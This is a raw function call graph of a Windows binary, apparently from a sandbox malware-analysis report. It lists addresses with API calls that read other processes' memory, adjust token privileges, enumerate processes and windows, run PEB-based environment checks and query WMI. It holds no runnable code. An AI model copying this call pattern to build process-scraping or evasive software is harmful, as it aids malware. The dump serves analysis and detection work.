47e42c 114522->114561 114524 4c95fc 114570 43fba0 114524->114570 114603 47f70e 114527->114603 114529 4c9593 114529->114516 114737 439a44 114530->114737 114532 439a31 114532->114518 114749 454a59 114533->114749 114535 4545af 114536 454651 GetVersionExA 114535->114536 114537 4546df 114536->114537 114538 4ca2b0 6 API calls 114537->114538 114539 45473e 114538->114539 114540 4ca2b0 6 API calls 114539->114540 114541 45479d 114540->114541 114776 450dd1 114541->114776 114543 4548a5 114783 44fb1e 114543->114783 114545 4548e4 114793 454ef8 114545->114793 114547 454927 114819 455ca7 114547->114819 114551 454956 114825 4ca730 114551->114825 114553 454976 114830 4cc4e0 114553->114830 114555 45499f 114556 4cb3e0 9 API calls 114555->114556 114557 4549f4 RegisterClipboardFormatA 114556->114557 114558 454a0f 114557->114558 114558->114520 114560 47e3bc 114559->114560 114560->114522 114563 47e445 114561->114563 114562 47e484 lstrcpynW 114564 47e494 114562->114564 114563->114562 114908 47e637 114564->114908 114566 47e5d0 MessageBoxA 114568 47e5bb 114566->114568 114568->114524 114569 47e4dd 114569->114566 114569->114568 114914 47ef67 GetPEB 114569->114914 114919 43ff2b 114570->114919 114572 43fbbc 114573 43ff05 114572->114573 114927 4400b3 6 API calls 114572->114927 114923 440163 114573->114923 114577 43fbe5 114578 4cb3e0 9 API calls 114577->114578 114579 43fc03 114578->114579 114928 4cb6b0 PathFileExistsA 114579->114928 114581 43fc67 114581->114573 114929 4400b3 6 API calls 114581->114929 114583 43fc8c 114584 4cb3e0 9 API calls 114583->114584 114585 43fcaa 114584->114585 114930 4cb6c0 CreateFileA 114585->114930 114587 43fd71 114938 4400b3 6 API calls 114587->114938 114589 43fd1a 114589->114587 114937 4cb120 MessageBoxA __ftol __ftol __ftol __ftol 114589->114937 114590 43fd79 114591 4cb3e0 9 API calls 114590->114591 114593 43fd97 114591->114593 114939 4cb6b0 PathFileExistsA 114593->114939 114595 43fdfb 114595->114573 114940 4400b3 6 API calls 114595->114940 114597 43fe20 114598 4cb3e0 9 API calls 114597->114598 114599 43fe3e 114598->114599 114600 4cb6c0 4 API calls 114599->114600 114601 43feae 114600->114601 114601->114573 114941 4cb120 MessageBoxA __ftol __ftol __ftol __ftol 114601->114941 114604 47f718 114603->114604 114607 47fcf0 114604->114607 114606 47f7c7 114606->114529 114613 4ceb90 SetCurrentDirectoryA 114607->114613 114614 483495 114607->114614 114608 47fd06 114621 4cb6b0 PathFileExistsA 114608->114621 114610 47fd82 114610->114606 114613->114608 114622 4ceb40 GetCurrentDirectoryA 114614->114622 114616 4835b0 114616->114608 114617 4834ad 114617->114616 114619 483561 114617->114619 114627 4835c8 114617->114627 114702 4ceb90 SetCurrentDirectoryA 114619->114702 114621->114610 114623 4ceb7d 114622->114623 114624 4ceb5d 114622->114624 114623->114617 114703 4d0680 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114624->114703 114626 4ceb72 114626->114617 114628 483a41 114627->114628 114629 4835e2 114627->114629 114631 483a4b 114628->114631 114632 483bc0 114628->114632 114704 4ceba0 114629->114704 114633 4ceba0 22 API calls 114631->114633 114634 483bca 114632->114634 114635 483d3f 114632->114635 114637 483a72 114633->114637 114638 4ceba0 22 API calls 114634->114638 114644 4ceba0 22 API calls 114635->114644 114689 48382b 114635->114689 114636 483609 114639 483664 114636->114639 114640 483614 114636->114640 114641 483a7d 114637->114641 114661 483acd 114637->114661 114643 483bf1 114638->114643 114642 4ceba0 22 API calls 114639->114642 114718 4ccb60 28 API calls 114640->114718 114727 4ccb60 28 API calls 114641->114727 114647 48368b 114642->114647 114648 483bfc 114643->114648 114664 483c4c 114643->114664 114649 483d70 114644->114649 114650 4836e6 114647->114650 114651 483696 114647->114651 114730 4ccb60 28 API calls 114648->114730 114653 483d7b 114649->114653 114667 483dcb 114649->114667 114656 4ceba0 22 API calls 114650->114656 114719 4ccb60 28 API calls 114651->114719 114733 4ccb60 28 API calls 114653->114733 114658 48370d 114656->114658 114660 483718 114658->114660 114669 483768 114658->114669 114659 483641 114659->114689 114720 4ccb60 28 API calls 114660->114720 114662 4842ef PathFileExistsA 114661->114662 114672 483b12 114662->114672 114665 4842ef PathFileExistsA 114664->114665 114673 483c91 114665->114673 114666 483ef4 114666->114619 114668 4842ef PathFileExistsA 114667->114668 114675 483e10 114668->114675 114716 4842ef PathFileExistsA 114669->114716 114671 4837ad 114684 48385b 114671->114684 114686 4837ca 114671->114686 114672->114689 114728 484331 50 API calls 114672->114728 114673->114689 114731 484331 50 API calls 114673->114731 114675->114689 114734 484331 50 API calls 114675->114734 114676 483b74 114729 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114676->114729 114679 483cf3 114732 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114679->114732 114681 483e72 114735 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114681->114735 114685 4842ef PathFileExistsA 114684->114685 114688 4838a0 114685->114688 114721 484331 50 API calls 114686->114721 114692 4838bd 114688->114692 114694 48394e 114688->114694 114736 4cb6b0 PathFileExistsA 114689->114736 114690 48380f 114722 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114690->114722 114723 484331 50 API calls 114692->114723 114695 4842ef PathFileExistsA 114694->114695 114698 483993 114695->114698 114696 483902 114724 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114696->114724 114698->114689 114725 484331 50 API calls 114698->114725 114700 4839f5 114726 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114700->114726 114702->114616 114703->114626 114706 4cebb6 114704->114706 114705 4cec8e 114705->114636 114706->114705 114707 4d2327 19 API calls 114706->114707 114708 4cebec 114707->114708 114709 4cec22 RegOpenKeyA 114708->114709 114710 4cec76 114709->114710 114711 4cec33 RegQueryValueExA 114709->114711 114713 4d22ee 19 API calls 114710->114713 114712 4cec5c RegCloseKey 114711->114712 114712->114710 114715 4cec7c 114713->114715 114715->114636 114717 48430f 114716->114717 114717->114671 114718->114659 114719->114659 114720->114659 114721->114690 114722->114689 114723->114696 114724->114689 114725->114700 114726->114689 114727->114659 114728->114676 114729->114689 114730->114659 114731->114679 114732->114689 114733->114659 114734->114681 114735->114689 114736->114666 114738 439a6c 114737->114738 114739 439abf GetCurrentProcess 114738->114739 114742 439af4 114739->114742 114740 439b24 OpenProcessToken 114741 439b5d LookupPrivilegeValueA 114740->114741 114743 439b46 114740->114743 114744 439b91 AdjustTokenPrivileges 114741->114744 114745 439b7a 114741->114745 114742->114740 114743->114741 114746 439c18 114744->114746 114747 439c2f CloseHandle 114744->114747 114745->114744 114746->114747 114748 439c47 114747->114748 114748->114532 114835 454e4e GetPEB 114749->114835 114752 454e4e GetPEB 114753 454ae3 114752->114753 114754 454e4e GetPEB 114753->114754 114775 454aa4 114753->114775 114755 454b2f 114754->114755 114756 454e4e GetPEB 114755->114756 114755->114775 114757 454b7b 114756->114757 114758 454e4e GetPEB 114757->114758 114757->114775 114759 454bc7 114758->114759 114760 454e4e GetPEB 114759->114760 114759->114775 114761 454c13 114760->114761 114762 454e4e GetPEB 114761->114762 114761->114775 114763 454c5f 114762->114763 114764 454e4e GetPEB 114763->114764 114763->114775 114765 454cab 114764->114765 114766 454e4e GetPEB 114765->114766 114765->114775 114767 454cf7 114766->114767 114768 454e4e GetPEB 114767->114768 114767->114775 114769 454d43 114768->114769 114770 454e4e GetPEB 114769->114770 114769->114775 114771 454d8f 114770->114771 114772 454e4e GetPEB 114771->114772 114771->114775 114773 454ddb 114772->114773 114774 454e4e GetPEB 114773->114774 114773->114775 114774->114775 114775->114535 114777 4caef0 5 API calls 114776->114777 114778 450dfc 114777->114778 114779 450e16 GetTempPathA 114778->114779 114780 450e34 114779->114780 114837 4cc400 114780->114837 114782 450e6e 114782->114543 114784 44fb46 114783->114784 114785 44fba6 114784->114785 114787 44fbb5 114784->114787 114853 4500cc 33 API calls 114785->114853 114843 450181 114787->114843 114791 44fc88 114792 44fbb0 114791->114792 114854 4509fe 7 API calls 114791->114854 114855 4cb840 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114791->114855 114792->114545 114794 454f19 114793->114794 114798 454f8f 114794->114798 114869 452235 114794->114869 114796 454fb8 114797 454fe1 RtlMoveMemory 114796->114797 114796->114798 114799 454ffe 114797->114799 114798->114547 114800 4552e8 114799->114800 114808 455121 114799->114808 114875 4cb840 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114800->114875 114802 45532e 114876 4cc590 36 API calls 114802->114876 114803 4552e0 114803->114798 114877 4cc590 36 API calls 114803->114877 114807 4553e2 114807->114798 114878 453491 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114807->114878 114808->114803 114873 453491 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114808->114873 114874 4cc590 36 API calls 114808->114874 114811 45550e 114879 4cc650 29 API calls _rand 114811->114879 114813 455556 114813->114798 114814 44fb1e 33 API calls 114813->114814 114816 455613 114814->114816 114815 455695 114815->114798 114817 454ef8 70 API calls 114815->114817 114816->114815 114880 4557f1 65 API calls 114816->114880 114817->114798 114820 455cb5 114819->114820 114882 455cde 114820->114882 114822 454950 114823 4562a0 GetWindowThreadProcessId 114822->114823 114824 4562d7 114823->114824 114824->114551 114826 4ca73d 114825->114826 114827 4ca739 114825->114827 114907 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114826->114907 114827->114553 114829 4ca744 114829->114553 114831 4cc4ee GetCurrentDirectoryA 114830->114831 114832 4cc502 114830->114832 114831->114832 114834 4cc549 114831->114834 114833 4cc526 GetDiskFreeSpaceExA 114832->114833 114832->114834 114833->114834 114834->114555 114836 454a97 114835->114836 114836->114752 114836->114775 114838 4cc42f 114837->114838 114839 4cc40e 114837->114839 114838->114782 114839->114838 114842 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114839->114842 114841 4cc443 114841->114782 114842->114841 114844 4501a9 114843->114844 114856 4ca9c0 114844->114856 114846 4501dd 114847 450219 NtQueryInformationProcess 114846->114847 114848 450231 114847->114848 114849 450248 CloseHandle 114847->114849 114848->114849 114850 450260 114849->114850 114851 450293 RtlMoveMemory 114850->114851 114852 4502a6 114850->114852 114851->114852 114852->114791 114853->114792 114854->114791 114855->114791 114857 4ca9cd 114856->114857 114858 4ca9c9 114856->114858 114861 4ca140 114857->114861 114858->114846 114862 4ca149 GetProcessHeap 114861->114862 114863 4ca154 RtlAllocateHeap 114861->114863 114862->114863 114864 4ca169 MessageBoxA 114863->114864 114865 4ca185 114863->114865 114868 4ca060 CoUninitialize ExitProcess 114864->114868 114865->114846 114867 4ca182 114867->114865 114868->114867 114870 45224f 114869->114870 114872 452397 114870->114872 114881 4514ac 7 API calls 114870->114881 114872->114796 114873->114808 114874->114808 114875->114802 114876->114803 114877->114807 114878->114811 114879->114813 114880->114815 114881->114872 114883 455cf1 114882->114883 114892 455ef4 114883->114892 114885 455ed0 114896 45616b EnumWindows 114885->114896 114887 455d28 114887->114885 114888 455e72 114887->114888 114898 45606e GetParent 114887->114898 114899 4560ae IsWindowVisible 114887->114899 114900 4560ee GetWindowThreadProcessId 114887->114900 114888->114822 114893 455f09 114892->114893 114894 455f21 EnumWindows 114893->114894 114895 455f4a 114894->114895 114901 45604f 114894->114901 114895->114887 114897 45618f 114896->114897 114903 456281 114896->114903 114897->114888 114898->114887 114899->114887 114900->114887 114902 456068 114901->114902 114906 4561b4 GetWindowThreadProcessId GetAncestor 114903->114906 114905 45629a 114906->114905 114907->114829 114909 47e659 114908->114909 114913 47e8e5 114909->114913 114915 47edcd GetPEB 114909->114915 114911 47e76a 114911->114913 114917 47eb08 VirtualAlloc 114911->114917 114913->114569 114914->114566 114916 47edee 114915->114916 114916->114911 114918 47eb1f 114917->114918 114918->114913 114920 4c9625 114919->114920 114921 43ff47 GetNativeSystemInfo 114920->114921 114922 43ffc9 114921->114922 114922->114572 114924 440171 114923->114924 114942 440195 114924->114942 114926 43ff1d 114926->114510 114927->114577 114928->114581 114929->114583 114931 4cb752 114930->114931 114935 4cb6e7 114930->114935 114931->114589 114932 4cb744 CloseHandle 114932->114931 114933 4cb705 WriteFile 114934 4cb73c 114933->114934 114933->114935 114934->114932 114935->114932 114935->114933 114936 4cb729 CloseHandle 114935->114936 114936->114589 114937->114587 114938->114590 114939->114595 114940->114597 114941->114573 114948 4401bd 114942->114948 114943 440395 NtQueryVirtualMemory 114943->114948 114944 440edf CloseHandle 114949 440389 114944->114949 114945 440411 NtQueryVirtualMemory 114945->114948 114946 4ca2b0 6 API calls 114946->114948 114947 440548 ReadProcessMemory 114947->114948 114948->114943 114948->114944 114948->114945 114948->114946 114948->114947 114948->114949 114950 4409fe ReadProcessMemory 114948->114950 114952 4cb760 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114948->114952 114953 440d1e 114948->114953 114954 440ff3 7 API calls 114948->114954 114949->114926 114950->114948 114952->114948 114953->114944 114954->114948 114956 440163 13 API calls 114955->114956 114957 47f56e 114956->114957 114958 47f585 GetModuleHandleA 114957->114958 114960 47f578 114957->114960 114959 47f59a 114958->114959 114959->114960 114960->114512 114962 4d3c3e 114961->114962 114963 4d3c74 114961->114963 114981 4d3ad6 GetModuleHandleA GetVersionExA GetEnvironmentVariableA GetModuleFileNameA 114962->114981 114963->114484 114965 4d3c43 114966 4d3c4d 114965->114966 114967 4d3c77 114965->114967 114982 4d49f6 5 API calls _rand 114965->114982 114966->114967 114969 4d3c68 HeapDestroy 114966->114969 114967->114484 114969->114963 114970->114491 114971->114485 114972->114499 114973->114502 114974->114504 114975->114506 114976->114487 114977->114492 114978->114498 114979->114485 114980->114485 114981->114965 114982->114966 114983 429c90 GetProcessHeap CoInitialize 114984 42a050 114983->114984 114985 401326 114986 40132c 114985->114986 115019 40bb11 114986->115019 114988 401377 114989 40bb11 67 API calls 114988->114989 114990 4013c6 114989->114990 115032 40bfd2 114990->115032 114992 401461 OpenFileMappingA 114993 40149f MapViewOfFile 114992->114993 115017 401488 114992->115017 114993->115017 114994 402650 Sleep 114994->115017 114996 401427 114996->114992 114996->114994 115042 40c1f1 GetCurrentProcessId 114996->115042 115043 42a010 114996->115043 114998 40158f 73AF1D90 114998->115017 115003 42a010 24 API calls 115003->115017 115004 42a0b0 GetProcessHeap RtlAllocateHeap MessageBoxA 115004->115017 115005 40260f RtlMoveMemory 115005->114994 115005->115017 115006 40d187 6 API calls 115006->115017 115007 40bb11 67 API calls 115007->115017 115009 40d48f 50 API calls 115009->115017 115014 42a430 32 API calls 115014->115017 115015 4102fe 133 API calls 115015->115017 115016 40bfd2 9 API calls 115016->115005 115017->114993 115017->114994 115017->114996 115017->115003 115017->115004 115017->115005 115017->115006 115017->115007 115017->115009 115017->115014 115017->115015 115017->115016 115018 40bfd2 9 API calls 115017->115018 115046 40c22c LocalAlloc LocalFree GetProcessHeap RtlAllocateHeap MessageBoxA 115017->115046 115047 40c609 GetProcessHeap RtlAllocateHeap MessageBoxA 115017->115047 115048 40c788 6 API calls 115017->115048 115049 42a180 115017->115049 115071 40e11f 14 API calls 115017->115071 115072 40e8c7 57 API calls 115017->115072 115073 40f452 35 API calls 115017->115073 115074 40f66e 35 API calls 115017->115074 115075 40f9ed 35 API calls 115017->115075 115018->115017 115020 40bb2b 115019->115020 115021 40bb4c CreateToolhelp32Snapshot 115020->115021 115022 40bb89 115021->115022 115023 40bbd7 Process32First 115022->115023 115024 40bbad 115022->115024 115031 40bc66 115023->115031 115024->114988 115025 40bf78 CloseHandle 115029 40bde2 115025->115029 115026 42a180 47 API calls 115026->115031 115028 40bdcd CloseHandle 115028->115029 115029->115024 115030 40be14 Process32Next 115030->115031 115031->115025 115031->115026 115031->115028 115031->115030 115076 42c2c0 115031->115076 115033 40bfe5 115032->115033 115034 40c0bf CreateWaitableTimerA 115033->115034 115035 40c0e8 115034->115035 115036 40c0ff SetWaitableTimer 115034->115036 115035->115036 115037 40c145 MsgWaitForMultipleObjects 115036->115037 115038 40c12e 115036->115038 115037->115038 115038->115037 115039 40c1a7 CloseHandle 115038->115039 115082 42c320 PeekMessageA GetMessageA TranslateMessage DispatchMessageA PeekMessageA 115038->115082 115041 40c1bc 115039->115041 115041->114996 115042->114996 115045 4dc470 24 API calls 115043->115045 115044 42a03c 115044->114998 115045->115044 115046->115017 115047->115017 115048->115017 115050 42a208 115049->115050 115055 42a19f 115049->115055 115051 42a213 115050->115051 115052 42a2f6 115050->115052 115057 42a2e7 115051->115057 115059 42a293 115051->115059 115060 42a2b1 115051->115060 115068 42a22e 115051->115068 115070 42a3dd 115051->115070 115053 42a372 115052->115053 115054 42a2fd 115052->115054 115053->115070 115088 4dc2d3 43 API calls 115053->115088 115056 42a344 115054->115056 115054->115057 115055->115070 115083 42a110 GetProcessHeap RtlAllocateHeap MessageBoxA 115055->115083 115087 4dc2d3 43 API calls 115056->115087 115057->115070 115086 4dc2d3 43 API calls 115057->115086 115084 42a110 GetProcessHeap RtlAllocateHeap MessageBoxA 115059->115084 115085 430830 44 API calls 115060->115085 115066 42a1f9 115066->115017 115067 42a2a2 115067->115017 115069 429e40 3 API calls 115068->115069 115068->115070 115069->115070 115070->115017 115071->115017 115072->115017 115073->115017 115074->115017 115075->115017 115077 42c303 115076->115077 115080 42c2c8 115076->115080 115081 4e6450 39 API calls _rand 115077->115081 115079 42c312 115079->115031 115080->115031 115081->115079 115082->115038 115083->115066 115084->115067 115085->115068 115086->115068 115087->115068 115088->115068 115089 4028e9 115090 402930 115089->115090 115105 402dbb 115090->115105 115093 40294f 115133 404a9e 115093->115133 115094 402a4c 115095 42a180 47 API calls 115094->115095 115096 402ad2 115095->115096 115097 40938c strstr 115096->115097 115098 402b3a 115097->115098 115099 406c14 32 API calls 115098->115099 115102 402d2c 115098->115102 115100 402b80 115099->115100 115101 404a9e 32 API calls 115100->115101 115103 402c67 115101->115103 115104 409662 68 API calls 115103->115104 115104->115102 115106 402ddc 115105->115106 115107 402e4b 115106->115107 115108 402fdf inet_addr 115106->115108 115137 403765 115107->115137 115110 402ff6 115108->115110 115111 42b4e0 3 API calls 115110->115111 115120 403024 115111->115120 115112 402e68 115157 42ac30 18 API calls 115112->115157 115114 402eaa 115158 42ac10 VariantClear VariantInit 115114->115158 115116 402ec8 115117 403765 25 API calls 115116->115117 115128 402f9b 115116->115128 115118 402f3b 115117->115118 115159 42ac30 18 API calls 115118->115159 115161 42b6b0 GetProcessHeap RtlAllocateHeap MessageBoxA 115120->115161 115121 402f7d 115160 42ac10 VariantClear VariantInit 115121->115160 115124 4031f8 SendARP 115125 403210 115124->115125 115126 42b4e0 3 API calls 115125->115126 115125->115128 115131 40324d 115126->115131 115127 403165 115127->115124 115128->115093 115129 4035cb 115130 42b880 3 API calls 115129->115130 115130->115128 115131->115129 115162 42b850 46 API calls 115131->115162 115134 404afe 115133->115134 115136 404b88 115134->115136 115214 406170 32 API calls 115134->115214 115138 4037b0 115137->115138 115163 403a0c 115138->115163 115140 4037eb 115141 403992 115140->115141 115180 40480f 115140->115180 115187 42abe0 VariantClear VariantCopy 115141->115187 115143 40381f 115146 40480f 10 API calls 115143->115146 115145 4039d8 115188 42ac10 VariantClear VariantInit 115145->115188 115156 403840 115146->115156 115148 4039fa 115148->115112 115149 403941 115150 403951 SysFreeString 115149->115150 115151 403966 115150->115151 115152 40397d SysFreeString 115150->115152 115151->115152 115152->115141 115153 40480f 10 API calls 115153->115156 115155 403900 SysFreeString 115155->115156 115156->115149 115156->115153 115156->115155 115185 404964 lstrcat 115156->115185 115157->115114 115158->115116 115159->115121 115160->115128 115161->115127 115162->115131 115164 403a1f 115163->115164 115165 403aa0 CoInitialize 115164->115165 115166 403ae8 115165->115166 115167 403aff CoInitializeSecurity 115165->115167 115166->115167 115168 403b3e 115167->115168 115189 40461e 115168->115189 115170 403bae 115171 403c55 CoCreateInstance 115170->115171 115172 403ca7 115171->115172 115173 403e8d CoUninitialize 115172->115173 115174 40480f 10 API calls 115172->115174 115179 403e5e 115173->115179 115175 403dbd 115174->115175 115176 403ded SysFreeString 115175->115176 115177 403e05 115176->115177 115177->115173 115178 403e26 CoSetProxyBlanket 115177->115178 115178->115179 115179->115140 115181 4040e1 9 API calls 115180->115181 115182 40482c SysAllocString 115181->115182 115184 40484c 115182->115184 115184->115143 115186 404990 115185->115186 115186->115156 115187->115145 115188->115148 115190 404638 115189->115190 115195 4040e1 115190->115195 115192 404692 115193 4046f3 IIDFromString 115192->115193 115194 404703 115193->115194 115194->115170 115196 404101 115195->115196 115197 42b4e0 3 API calls 115196->115197 115198 404116 115197->115198 115203 40421d 115198->115203 115200 40412a 115202 404174 115200->115202 115213 404449 GetProcessHeap RtlAllocateHeap MessageBoxA 115200->115213 115202->115192 115204 404256 115203->115204 115205 40428a strlen 115204->115205 115206 4042a2 115204->115206 115205->115206 115207 4042da MultiByteToWideChar 115206->115207 115210 4043a3 115206->115210 115208 404306 115207->115208 115209 42b8f0 3 API calls 115208->115209 115211 404351 115209->115211 115210->115200 115212 404378 MultiByteToWideChar 115211->115212 115212->115210 115213->115202 115214->115136 115215 41ac6d 115220 41ac88 115215->115220 115217 41ac75 115234 41bb13 115217->115234 115219 41ac7a 115221 41ac9b 115220->115221 115222 42a010 24 API calls 115221->115222 115223 41ad0a 115222->115223 115224 42a010 24 API calls 115223->115224 115225 41ad44 115224->115225 115238 41b12e 115225->115238 115227 41ad52 115228 42b4e0 3 API calls 115227->115228 115229 41ad95 115228->115229 115230 42b4e0 3 API calls 115229->115230 115231 41ae28 115230->115231 115256 424eac 115231->115256 115232 41af0a 115232->115217 115235 41bb2d 115234->115235 115393 41bb94 115235->115393 115237 41bb6b 115237->115219 115239 41b141 115238->115239 115240 42a010 24 API calls 115239->115240 115241 41b168 115240->115241 115268 41b34e 115241->115268 115243 41b17b 115244 41b34e 2 API calls 115243->115244 115245 41b190 115244->115245 115271 41b45b 115245->115271 115247 41b214 115248 42a010 24 API calls 115247->115248 115249 41b2a0 115248->115249 115250 42b4e0 3 API calls 115249->115250 115251 41b2c9 115250->115251 115252 42a010 24 API calls 115251->115252 115254 41b30d 115252->115254 115253 42a010 24 API calls 115255 41b33d 115253->115255 115254->115253 115255->115227 115294 42383f 115256->115294 115325 42318a 115256->115325 115257 424edf 115259 424eec 115257->115259 115362 42291a 6 API calls 115257->115362 115259->115232 115260 424f01 115363 42291a 6 API calls 115260->115363 115262 424f4a 115263 41b45b 7 API calls 115262->115263 115265 424fcc 115263->115265 115364 422f50 GetProcessHeap RtlAllocateHeap 115265->115364 115285 41b3bb 115268->115285 115270 41b368 115270->115243 115272 41b483 115271->115272 115273 41b3bb 2 API calls 115272->115273 115274 41b4a8 115272->115274 115273->115274 115275 42b4e0 3 API calls 115274->115275 115276 41b63d 115274->115276 115277 41b5fc 115275->115277 115282 41b75f 115276->115282 115291 41b9a7 GetProcessHeap RtlAllocateHeap 115276->115291 115277->115276 115290 41b9a7 GetProcessHeap RtlAllocateHeap 115277->115290 115281 41b8d5 115281->115247 115284 41b805 115282->115284 115292 41b9a7 GetProcessHeap RtlAllocateHeap 115282->115292 115284->115281 115293 41b9a7 GetProcessHeap RtlAllocateHeap 115284->115293 115286 41b3d1 GetProcessHeap 115285->115286 115287 41b3ff RtlAllocateHeap 115285->115287 115289 41b3e3 115286->115289 115288 41b41f 115287->115288 115288->115270 115289->115287 115290->115276 115291->115282 115292->115284 115293->115281 115300 423331 115294->115300 115295 42a010 24 API calls 115297 4241bc 115295->115297 115296 4237a8 115296->115295 115298 42a010 24 API calls 115297->115298 115299 4241e4 115298->115299 115299->115257 115300->115296 115301 4234be 115300->115301 115307 42a010 24 API calls 115300->115307 115311 41b45b 7 API calls 115300->115311 115317 424206 42 API calls 115300->115317 115322 41b34e 2 API calls 115300->115322 115323 42b4e0 GetProcessHeap RtlAllocateHeap MessageBoxA 115300->115323 115371 422f50 GetProcessHeap RtlAllocateHeap 115300->115371 115302 42a010 24 API calls 115301->115302 115303 4234f3 115302->115303 115304 41b45b 7 API calls 115303->115304 115305 42358a 115304->115305 115365 424206 115305->115365 115307->115300 115308 423607 115309 423695 115308->115309 115370 422f50 GetProcessHeap RtlAllocateHeap 115308->115370 115312 42a010 24 API calls 115309->115312 115311->115300 115313 4236ce 115312->115313 115314 42a010 24 API calls 115313->115314 115315 4236f0 115314->115315 115316 42a010 24 API calls 115315->115316 115318 423733 115316->115318 115317->115300 115319 42b4e0 3 API calls 115318->115319 115320 423764 115319->115320 115321 42a010 24 API calls 115320->115321 115321->115296 115322->115300 115323->115300 115326 4231a4 115325->115326 115327 42a010 24 API calls 115326->115327 115328 4231fb 115327->115328 115329 42a010 24 API calls 115328->115329 115330 42322f 115329->115330 115331 42a430 32 API calls 115330->115331 115341 4232ca 115331->115341 115332 42a010 24 API calls 115334 4241bc 115332->115334 115333 4237a8 115333->115332 115335 42a010 24 API calls 115334->115335 115336 4241e4 115335->115336 115336->115257 115337 4234be 115338 42a010 24 API calls 115337->115338 115339 4234f3 115338->115339 115340 41b45b 7 API calls 115339->115340 115342 42358a 115340->115342 115341->115333 115341->115337 115347 41b45b 7 API calls 115341->115347 115353 424206 42 API calls 115341->115353 115358 41b34e 2 API calls 115341->115358 115360 42a010 24 API calls 115341->115360 115361 42b4e0 GetProcessHeap RtlAllocateHeap MessageBoxA 115341->115361 115392 422f50 GetProcessHeap RtlAllocateHeap 115341->115392 115343 424206 42 API calls 115342->115343 115345 423607 115343->115345 115344 423695 115348 42a010 24 API calls 115344->115348 115345->115344 115391 422f50 GetProcessHeap RtlAllocateHeap 115345->115391 115347->115341 115349 4236ce 115348->115349 115350 42a010 24 API calls 115349->115350 115351 4236f0 115350->115351 115352 42a010 24 API calls 115351->115352 115354 423733 115352->115354 115353->115341 115355 42b4e0 3 API calls 115354->115355 115356 423764 115355->115356 115357 42a010 24 API calls 115356->115357 115357->115333 115358->115341 115360->115341 115361->115341 115362->115260 115363->115262 115364->115259 115372 424273 115365->115372 115367 424225 115378 42451e 115367->115378 115369 424231 115369->115308 115370->115309 115371->115300 115373 424292 115372->115373 115374 42bc10 32 API calls 115373->115374 115375 4242cf 115374->115375 115382 4242ff 115375->115382 115377 4242de 115377->115367 115380 424553 115378->115380 115379 424663 115379->115369 115380->115379 115390 424677 31 API calls 115380->115390 115383 42433a 115382->115383 115386 424346 115383->115386 115388 42c410 32 API calls _rand 115383->115388 115385 424375 115385->115386 115389 4243ea GetProcessHeap RtlAllocateHeap MessageBoxA 115385->115389 115386->115377 115388->115385 115389->115386 115390->115380 115391->115344 115392->115341 115394 41bbc3 115393->115394 115396 41bc58 115394->115396 115426 41c12b 34 API calls 115394->115426 115397 42bc10 32 API calls 115396->115397 115399 41bcc2 115397->115399 115415 41c35b 115399->115415 115400 41bd77 115401 42bc10 32 API calls 115400->115401 115402 41bde3 115401->115402 115421 41c443 115402->115421 115404 41be0a 115405 41be60 OpenProcess 115404->115405 115406 41be2f GetCurrentProcess 115404->115406 115411 41be41 115405->115411 115406->115411 115407 41be99 VirtualQueryEx 115407->115411 115408 41c09c CloseHandle 115412 41c0b1 115408->115412 115409 41c056 115409->115408 115410 42b8f0 3 API calls 115410->115411 115411->115407 115411->115408 115411->115409 115411->115410 115413 41bfd8 ReadProcessMemory 115411->115413 115414 41bfbd 115411->115414 115412->115237 115413->115414 115414->115411 115414->115413 115416 41c380 115415->115416 115417 41c386 115415->115417 115416->115400 115418 41c39f 115417->115418 115419 42b8f0 3 API calls 115417->115419 115418->115400 115420 41c3c1 115419->115420 115420->115400 115422 41c48b 115421->115422 115425 41c46c 115421->115425 115423 41c4a4 115422->115423 115424 42b8f0 3 API calls 115422->115424 115423->115404 115424->115425 115425->115404 115426->115396 115427 4dc182 GetVersion 115453 4de497 HeapCreate 115427->115453 115429 4dc1e0 115430 4dc1ed 115429->115430 115431 4dc1e5 115429->115431 115462 4de254 115430->115462 115497 4dc2af 8 API calls _rand 115431->115497 115434 4dc1f2 115436 4dc1fe 115434->115436 115437 4dc1f6 115434->115437 115472 4de098 115436->115472 115498 4dc2af 8 API calls _rand 115437->115498 115441 4dc208 GetCommandLineA 115442 4dc218 115441->115442 115486 4ddc60 115442->115486 115444 4dc227 115445 4dc22c GetStartupInfoA 115444->115445 115446 4dc23e 115445->115446 115447 4dc250 GetModuleHandleA 115446->115447 115448 4dc262 115447->115448 115499 4dd99d 27 API calls 115448->115499 115450 4dc26b 115500 4dda90 31 API calls _rand 115450->115500 115452 4dc27c 115454 4de4ed 115453->115454 115455 4de4b7 115453->115455 115454->115429 115501 4de34f 52 API calls 115455->115501 115457 4de4bc 115460 4de4d0 115457->115460 115502 4df49e RtlAllocateHeap 115457->115502 115459 4de4f0 115459->115429 115460->115459 115461 4de4e1 HeapDestroy 115460->115461 115461->115454 115503 4e06b2 RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 115462->115503 115464 4de25a TlsAlloc 115465 4de26a 115464->115465 115466 4de2a4 115464->115466 115504 4e443b 25 API calls _rand 115465->115504 115466->115434 115468 4de273 115468->115466 115469 4de27b TlsSetValue 115468->115469 115469->115466 115470 4de28c _rand 115469->115470 115471 4de292 GetCurrentThreadId 115470->115471 115471->115434 115473 4dc45e _rand 24 API calls 115472->115473 115474 4de0ab 115473->115474 115476 4de0b9 GetStartupInfoA 115474->115476 115505 4dc28a 7 API calls _rand 115474->115505 115482 4de1d8 115476->115482 115485 4de107 115476->115485 115478 4de203 GetStdHandle 115481 4de211 GetFileType 